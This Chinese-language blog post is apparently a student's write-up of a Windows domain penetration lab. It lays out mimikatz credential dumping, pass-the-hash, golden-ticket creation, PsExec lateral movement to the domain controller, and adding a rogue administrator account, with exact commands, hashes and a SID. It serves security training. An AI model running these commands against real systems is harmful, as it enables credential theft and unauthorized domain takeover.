预备知识

什么是域？

域是若干台计算机组成的集合，一个电脑也是。域中的电脑是分等级的，分为域控和成员机。

如何安装域？

在服务器管理中添加服务器角色，添加域服务

如何加入域?

首先一定要修改DNS服务器 ip为域控的ip，再使用域控的账号密码登录就可以加入了，账号的形式 域名/域控账号

哈希传递

当我们使用猕猴桃进行碰撞密码时，我们发现会没有明文出现，是因为高版本的windows是不会将明文密码保存在本机的。所以我们可以使用哈希传递拿取管理员权限。

使用语句：
privilege::debug
log
sekurlsa::logonpasswords
sekurlsa::pth /user: 用户名 /domian “域名” /ntlm: ntlm值

提取成功就会跳出获取权限的cmd框

PsExec的作用

能够使用域控的cmd

黄金票据

因为krbtgt账户其实就是那个KDC秘钥分发中心用的超管密码，我们拿着那个的票据，去访问客户机，客户机会认为我们是KDC秘钥分发中心，所以直接给了最高的权限允许我们访问，一般管理员会修改域控机密码，但是很少有管理员会修改Krbtgt的密码

我们通过以下语句来制作黄金票据

lsdump::dcsync /user:krbtgt 获取krbtgt的密码

提取其中的sid(不需要后面的-的数据) 和 hashNTLM

kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi （制作票据）

kerberos::ptt administrator.kiribi （加载票据）

然后打开cmd 再利用 PsExec 获取域控cmd

靶场实战

一、远程连接
根据提示：

连接：

二、查看目标主机是否在域内
输入：systeminfo
结果：不在域内

三、远程连接10.0.1.8查看是否在域内
输入：systeminfo
结果：在 zkaq.cn的域中

四、查看域控的ip
输入：ipconfig -all（观察dns服务器）
结果：ip为 10.0.1.6

五、使用猕猴桃碰撞10.0.1.8管理员密码
输入：
privilege::debug
log
sekurlsa::logonpasswords
结果：没有明文密码

六、尝试是否能连接10.0.1.6的cmd
通过cmd使用桌面的PxExec
输入：PsExec.exe \10.0.1.6 cmd
结果：登录失败，我们并没有权限

七、使用哈希传递获取权限
输入：sekurlsa::pth/user:administrator /domain:”zkaq.cn” /ntlm:61465a991b168727b65b3644aab823cd
结果：自动弹出cmd框

八、使用弹出的cmd使用PxEsec
先调节路径
输入：PsExec.exe \10.0.1.6 cmd
结果：成功连接上10.0.1.6的cmd

九、创建新管理员
输入：
net user yy yy1233321! /add
net localgroup administrators yy /add
结果：创建成功（忘记截图了）

十、连接10.0.1.6
在\C\Users\Administrators.DC\桌面中有flag

结果：

（黄金票据一直尝试错误了，就放弃了）

 申明：本账号所分享内容仅用于网络安全技术讨论，切勿用于违法途径，所有渗透都需获取授权，违者后果自行承担，与本号及作者无关，请谨记守法。

免费领取安全学习资料包！

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML，PHP，MySQL基础学习，信息收集，SQL注入,XSS，CSRF，暴力破解等等

 

应急响应笔记

学习路线